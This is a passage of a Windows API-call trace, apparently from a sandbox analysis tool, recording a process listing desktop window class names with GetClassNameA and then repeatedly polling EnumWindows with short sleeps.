lpClassName="IEFrame") returned 7 [0105.613] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.613] GetClassNameA (in: hWnd=0x30042, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0105.614] GetClassNameA (in: hWnd=0x2013c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0105.614] GetClassNameA (in: hWnd=0x20138, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x20148, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x10236, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0105.614] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0105.614] GetClassNameA (in: hWnd=0x101be, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0105.614] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0105.614] GetClassNameA (in: hWnd=0x10126, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x1012e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0105.614] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x1012c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0105.614] GetClassNameA (in: hWnd=0x10124, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0105.614] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0105.614] GetClassNameA (in: hWnd=0x10108, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0105.614] GetClassNameA (in: hWnd=0x10100, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0105.614] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.614] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x200e0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.615] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0105.615] GetClassNameA (in: hWnd=0x20034, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0105.615] GetClassNameA (in: hWnd=0x20036, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0105.615] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0105.615] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x200ee, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.615] GetClassNameA (in: hWnd=0x100ba, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0105.615] GetClassNameA (in: hWnd=0x2007c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0105.615] GetClassNameA (in: hWnd=0x20072, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0105.615] GetClassNameA (in: hWnd=0x4006e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0105.615] GetClassNameA (in: hWnd=0x10024, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0105.615] GetClassNameA (in: hWnd=0x10180, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0105.615] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0105.615] GetClassNameA (in: hWnd=0x100de, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0105.615] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.615] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10190, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0105.616] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x603aa, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x103b6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x103b4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x103b2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x103b0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x103ae, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10390, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1038e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1038c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1038a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10388, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x2023c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10382, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x1037a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10378, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.616] GetClassNameA (in: hWnd=0x10376, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x301de, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10356, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10354, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10348, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10346, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10344, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10342, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10340, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10338, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10336, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x2023a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10322, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10316, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10314, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10302, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.617] GetClassNameA (in: hWnd=0x10300, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x20230, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x10278, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x10276, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x10274, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x10272, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x20218, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.618] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10256, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10248, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10246, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10244, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10242, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10212, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10208, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x40016, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x10238, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0105.619] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.619] GetClassNameA (in: hWnd=0x20032, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.620] GetClassNameA (in: hWnd=0x2019e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.620] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.620] GetClassNameA (in: hWnd=0x20074, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0105.620] Sleep (dwMilliseconds=0x64) [0105.752] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0105.752] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0105.752] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0105.752] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0105.753] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x10120, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x10122, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x10118, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0105.753] GetClassNameA (in: hWnd=0x10116, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] GetClassNameA (in: hWnd=0x10114, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.753] Sleep (dwMilliseconds=0x64) [0105.859] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0105.859] Sleep (dwMilliseconds=0x64) [0105.999] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0105.999] Sleep (dwMilliseconds=0x64) [0106.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.107] Sleep (dwMilliseconds=0x64) [0106.235] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.235] Sleep (dwMilliseconds=0x64) [0106.343] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.343] Sleep (dwMilliseconds=0x64) [0106.453] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.453] Sleep (dwMilliseconds=0x64) [0106.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.561] Sleep (dwMilliseconds=0x64) [0106.669] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.669] Sleep (dwMilliseconds=0x64) [0106.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.796] Sleep (dwMilliseconds=0x64) [0106.903] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0106.904] Sleep (dwMilliseconds=0x64) [0107.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.014] Sleep (dwMilliseconds=0x64) [0107.155] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.155] Sleep (dwMilliseconds=0x64) [0107.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.263] Sleep (dwMilliseconds=0x64) [0107.469] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.470] Sleep (dwMilliseconds=0x64) [0107.624] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.625] Sleep (dwMilliseconds=0x64) [0107.734] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.734] Sleep (dwMilliseconds=0x64) [0107.846] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.846] Sleep (dwMilliseconds=0x64) [0107.950] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0107.951] Sleep (dwMilliseconds=0x64) [0108.060] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.060] Sleep (dwMilliseconds=0x64) [0108.177] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.178] Sleep (dwMilliseconds=0x64) [0108.294] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.294] Sleep (dwMilliseconds=0x64) [0108.449] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.449] Sleep (dwMilliseconds=0x64) [0108.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.608] Sleep (dwMilliseconds=0x64) [0108.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.717] Sleep (dwMilliseconds=0x64) [0108.825] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.825] Sleep (dwMilliseconds=0x64) [0108.955] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0108.955] Sleep (dwMilliseconds=0x64) [0109.075] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.075] Sleep (dwMilliseconds=0x64) [0109.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.185] Sleep (dwMilliseconds=0x64) [0109.294] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.294] Sleep (dwMilliseconds=0x64) [0109.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.403] Sleep (dwMilliseconds=0x64) [0109.516] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.517] Sleep (dwMilliseconds=0x64) [0109.622] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.622] Sleep (dwMilliseconds=0x64) [0109.736] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.736] Sleep (dwMilliseconds=0x64) [0109.866] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.866] Sleep (dwMilliseconds=0x64) [0109.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0109.982] Sleep (dwMilliseconds=0x64) [0110.099] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.099] Sleep (dwMilliseconds=0x64) [0110.200] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.200] Sleep (dwMilliseconds=0x64) [0110.382] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.382] Sleep (dwMilliseconds=0x64) [0110.511] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.511] Sleep (dwMilliseconds=0x64) [0110.649] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.649] Sleep (dwMilliseconds=0x64) [0110.750] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.750] Sleep (dwMilliseconds=0x64) [0110.869] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.870] Sleep (dwMilliseconds=0x64) [0110.972] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0110.973] Sleep (dwMilliseconds=0x64) [0111.093] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.094] Sleep (dwMilliseconds=0x64) [0111.240] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.240] Sleep (dwMilliseconds=0x64) [0111.346] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.346] Sleep (dwMilliseconds=0x64) [0111.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.496] Sleep (dwMilliseconds=0x64) [0111.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.612] Sleep (dwMilliseconds=0x64) [0111.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.733] Sleep (dwMilliseconds=0x64) [0111.881] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.881] Sleep (dwMilliseconds=0x64) [0111.986] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0111.986] Sleep (dwMilliseconds=0x64) [0112.103] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.104] Sleep (dwMilliseconds=0x64) [0112.205] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.206] Sleep (dwMilliseconds=0x64) [0112.314] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.314] Sleep (dwMilliseconds=0x64) [0112.460] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.460] Sleep (dwMilliseconds=0x64) [0112.564] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.564] Sleep (dwMilliseconds=0x64) [0112.679] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.679] Sleep (dwMilliseconds=0x64) [0112.783] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.783] Sleep (dwMilliseconds=0x64) [0112.893] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0112.893] Sleep (dwMilliseconds=0x64) [0113.018] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.018] Sleep (dwMilliseconds=0x64) [0113.127] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.127] Sleep (dwMilliseconds=0x64) [0113.236] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.236] Sleep (dwMilliseconds=0x64) [0113.349] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.350] Sleep (dwMilliseconds=0x64) [0113.455] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.455] Sleep (dwMilliseconds=0x64) [0113.612] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.612] Sleep (dwMilliseconds=0x64) [0113.721] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.721] Sleep (dwMilliseconds=0x64) [0113.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.840] Sleep (dwMilliseconds=0x64) [0113.955] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0113.955] Sleep (dwMilliseconds=0x64) [0114.064] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.064] Sleep (dwMilliseconds=0x64) [0114.189] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.190] Sleep (dwMilliseconds=0x64) [0114.300] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.300] Sleep (dwMilliseconds=0x64) [0114.420] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.420] Sleep (dwMilliseconds=0x64) [0114.533] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.533] Sleep (dwMilliseconds=0x64) [0114.642] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.643] Sleep (dwMilliseconds=0x64) [0114.784] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.784] Sleep (dwMilliseconds=0x64) [0114.894] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0114.895] Sleep (dwMilliseconds=0x64) [0115.099] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.101] Sleep (dwMilliseconds=0x64) [0115.211] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.211] Sleep (dwMilliseconds=0x64) [0115.322] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.322] Sleep (dwMilliseconds=0x64) [0115.473] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.473] Sleep (dwMilliseconds=0x64) [0115.582] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.582] Sleep (dwMilliseconds=0x64) [0115.693] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.693] Sleep (dwMilliseconds=0x64) [0115.801] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.801] Sleep (dwMilliseconds=0x64) [0115.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0115.934] Sleep (dwMilliseconds=0x64) [0116.052] EnumWindows 